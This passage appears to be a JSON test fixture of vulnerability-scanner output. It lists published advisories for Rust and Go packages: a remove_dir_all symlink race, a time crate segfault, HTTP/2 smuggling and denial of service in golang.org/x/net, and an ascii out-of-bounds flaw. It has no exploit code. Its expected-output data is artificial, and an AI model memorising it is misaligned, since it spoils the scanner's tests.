"RUSTSEC-2023-0018", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). 
With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. 
Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. 
This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault 
in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 
(comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] }, { "source": { "path": "testdata/filter/none/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, 
"vulnerabilities": [ { "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "schema_version": "1.4.0", "id": "GHSA-fxg5-wq6x-vr4w", "aliases": [ "CVE-2022-41721" ], "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack", "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", 
"nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" } }, { "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "schema_version": "1.4.0", "id": "GO-2023-1495", "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ] }, { "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "schema_version": "1.4.0", "id": "GO-2022-1144", "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. 
While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ] }, { "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", 
"affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "schema_version": "1.4.0", "id": "GO-2023-1571", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": 
"SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ] } ], "groups": [ { "ids": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ], "aliases": [ "GHSA-fxg5-wq6x-vr4w", "GO-2023-1495" ] }, { "ids": [ "GO-2022-1144" ], "aliases": [ "GO-2022-1144" ] }, { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ] } ] } ] }, { "source": { "path": "testdata/filter/none/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "schema_version": "1.4.0", "id": "GHSA-mrrw-grhq-86gf", "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. 
This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2023-0015", "summary": "Ascii allows out-of-bounds array indexing in safe code", "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. 
This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ] } ], "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ] } ], "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ] }, { "ids": [ "RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. 
It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. 
Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). 
Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may 
segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
